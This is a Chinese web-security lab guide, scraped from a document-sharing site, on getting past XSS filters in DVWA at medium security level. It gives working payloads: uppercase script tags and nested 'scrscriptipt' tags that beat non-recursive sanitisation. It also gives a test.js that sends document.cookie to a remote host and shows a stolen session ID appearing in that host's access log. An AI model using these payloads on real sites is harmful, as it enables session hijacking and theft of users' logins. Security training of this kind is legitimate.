网站大量收购独家精品文档,联系QQ:2885784924

Web安全与防护 实训指南 4.4绕过XSS漏洞防范措施.pdf

Web安全与防护 实训指南 4.4绕过XSS漏洞防范措施.pdf

  1. 1、本文档共2页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多

绕过XSS漏洞防范措施

【实训目的】

1.掌握绕过XSS攻击防范措施的技巧;

2.能够将登录用户的cookie发送到远程主机。

【实训步骤】

步骤1、登录DVWA系统。在DVWASecurity当中选择medium选项,并提

交。然后选择XSSreflected。

步骤2、检测XSS漏洞。在对话框中输入:xsscriptalert(/xss/)/script,

点击submit之后,此时,并没有弹出警告提示框。

图4-13DVWA系统XSS跨站中等安全级别界面

出现Helloxsalert(/xss/),说明script、/script被净化掉。

步骤3、尝试绕过净化或者过滤。

(1)大小写更换尝试,将script更换成SCRIPT。在对话框中输入:

xsSCRIPTalert(/xss/)/SCRIPT。点击submit之后,能弹出警告提示框,说

明仅对script的小写形式进行了净化。

(2)用scrscriptipt代替script尝试。在对话框中输入:

xsscrscriptiptalert(/xss/)/scrscriptipt。点击submit之后,能弹出警告提

示框,说明仅对script的小写形式进行了净化,并且没有递归净化。

步骤4、将cokie发送到远程主机。

(1)在另一台电脑安装XAMPP的主机,这台主机IP:,WEB

服务端口8000。

(2)启用远程主机的apache服务,并在htdos目录下编辑test.js。test.js的

内容为:

varimg=document.createElement(img);

img.src=http://:8000/log?+escape(document.cookie);

document.body.appendChild(img);

(3)在对话框中输入:

SCRIPTsrchttp://:8000/test.js/SCRIPT,点击submit。通

过firebug查看,将会看到以下源代码:

imgsrc=:8000/log?security%3Dmedium%3B%20PHPSE

SSID%3Dea554ac9604ee34ed83d828bd5d4e0ea,即将自己的cookie作为参数去

访问了:8000网站。

图4-14通过FireBug查看本机的操作

(4)在远程主机查看日志记录,观察是否有cookie值。在apache的logs文

件夹下找到access.log文件,并打开,会看到类似内容,其中包含了用户登录存

在XSS漏洞的网站的cookie。

图4-15远程主机access.log包含发送的cookie信息

在这里%3D、%3B、%20是URL编码,分别代表:、;、空格。

【实训总结】

通过实训可以看到:

1.XSS漏洞防范如果不严格可能会被绕过。

2.利用XSS漏洞可以窃取用户cookie;

3.在利用XSS漏洞时,防止输入URL过长,可引用其它网站的js文件。

文档评论(0)

balala11 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档